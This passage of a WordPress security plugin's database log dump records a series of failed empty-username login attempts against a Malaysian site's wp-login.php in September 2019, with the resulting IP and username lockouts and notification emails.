14:58:34',19220328,20625120,'https://bintara.com.my/2019/wp-login.php',1,0,'195.161.114.244'),(26453,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:58:36','2019-09-21 14:58:34',19427792,20625120,'https://bintara.com.my/2019/wp-login.php',1,0,'195.161.114.244'),(26454,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY60TDrcQxTmGrCWuaWUAAAAdQ\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.201.88\";s:11:\"REMOTE_PORT\";s:5:\"36323\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY60TDrcQxTmGrCWuaWUAAAAdQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569077969.819\";s:12:\"REQUEST_TIME\";s:10:\"1569077969\";}}','notice','2019-09-21 14:59:31','2019-09-21 14:59:30',19134912,20624504,'https://bintara.com.my/wordpress/wp-login.php',1,0,'149.202.201.88'),(26455,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:59:30\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:59:30\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:59:30\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:59:30\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:59:31','2019-09-21 14:59:30',19219696,20624504,'https://bintara.com.my/wordpress/wp-login.php',1,0,'149.202.201.88'),(26456,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:59:31','2019-09-21 14:59:30',19426608,20624504,'https://bintara.com.my/wordpress/wp-login.php',1,0,'149.202.201.88'),(26457,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY6@nkXpgmG5P@iB8lEjgAAAII\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"43.239.148.94\";s:11:\"REMOTE_PORT\";s:5:\"57358\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY6@nkXpgmG5P@iB8lEjgAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569078011.097\";s:12:\"REQUEST_TIME\";s:10:\"1569078011\";}}','notice','2019-09-21 15:00:12','2019-09-21 15:00:11',19165656,20654280,'https://bintara.com.my/test/wp-login.php',1,0,'43.239.148.94'),(26458,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:00:11\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:00:11\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:00:11\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:00:11\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:00:12','2019-09-21 15:00:11',19249456,20654280,'https://bintara.com.my/test/wp-login.php',1,0,'43.239.148.94'),(26459,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:00:12','2019-09-21 15:00:11',19456568,20654280,'https://bintara.com.my/test/wp-login.php',1,0,'43.239.148.94'),(26460,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY7BliJ7D9Gn7wDPh8osQAAAMo\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"194.244.33.34\";s:11:\"REMOTE_PORT\";s:5:\"54056\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY7BliJ7D9Gn7wDPh8osQAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078022.8559\";s:12:\"REQUEST_TIME\";s:10:\"1569078022\";}}','notice','2019-09-21 15:00:24','2019-09-21 15:00:23',19166192,20655304,'https://bintara.com.my/blog/wp-login.php',1,0,'194.244.33.34'),(26461,0,'lockout','host-lockout::194.244.33.34','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"194.244.33.34\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:00:23\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:00:23\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:00:23\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:00:23\";s:12:\"lockout_host\";s:13:\"194.244.33.34\";}','action','2019-09-21 15:00:24','2019-09-21 15:00:23',19251904,20655304,'https://bintara.com.my/blog/wp-login.php',1,0,'194.244.33.34'),(26462,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"194.244.33.34\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:00:23\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:00:23\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:00:23\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:00:23\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:00:24','2019-09-21 15:00:23',19251864,20655304,'https://bintara.com.my/blog/wp-login.php',1,0,'194.244.33.34'),(26463,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:00:24','2019-09-21 15:00:23',19459936,20655304,'https://bintara.com.my/blog/wp-login.php',1,0,'194.244.33.34'),(26464,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY7QbfBTP0kPOVnb8jy-wAAAE4\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"5.196.118.54\";s:11:\"REMOTE_PORT\";s:5:\"41031\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY7QbfBTP0kPOVnb8jy-wAAAE4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078081.6794\";s:12:\"REQUEST_TIME\";s:10:\"1569078081\";}}','notice','2019-09-21 15:01:23','2019-09-21 15:01:22',19191208,20681640,'https://bintara.com.my/test/wp-login.php',1,0,'5.196.118.54'),(26465,0,'lockout','host-lockout::5.196.118.54','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"5.196.118.54\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:01:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:01:22\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:01:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:01:22\";s:12:\"lockout_host\";s:12:\"5.196.118.54\";}','action','2019-09-21 15:01:23','2019-09-21 15:01:22',19277056,20681640,'https://bintara.com.my/test/wp-login.php',1,0,'5.196.118.54'),(26466,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"5.196.118.54\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:01:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:01:22\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:01:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:01:22\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:01:23','2019-09-21 15:01:22',19277040,20681640,'https://bintara.com.my/test/wp-login.php',1,0,'5.196.118.54'),(26467,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:01:23','2019-09-21 15:01:22',19484800,20681640,'https://bintara.com.my/test/wp-login.php',1,0,'5.196.118.54'),(26468,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY7T3kXpgmG5P@iB8lE1gAAAI0\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"129.204.85.17\";s:11:\"REMOTE_PORT\";s:5:\"52794\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY7T3kXpgmG5P@iB8lE1gAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078095.7673\";s:12:\"REQUEST_TIME\";s:10:\"1569078095\";}}','notice','2019-09-21 15:01:37','2019-09-21 15:01:36',19194208,20682464,'https://bintara.com.my/blog/wp-login.php',1,0,'129.204.85.17'),(26469,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:01:36\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:01:36\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:01:36\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:01:36\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:01:37','2019-09-21 15:01:36',19279048,20682464,'https://bintara.com.my/blog/wp-login.php',1,0,'129.204.85.17'),(26470,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:01:37','2019-09-21 15:01:36',19487088,20682464,'https://bintara.com.my/blog/wp-login.php',1,0,'129.204.85.17'),(26471,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 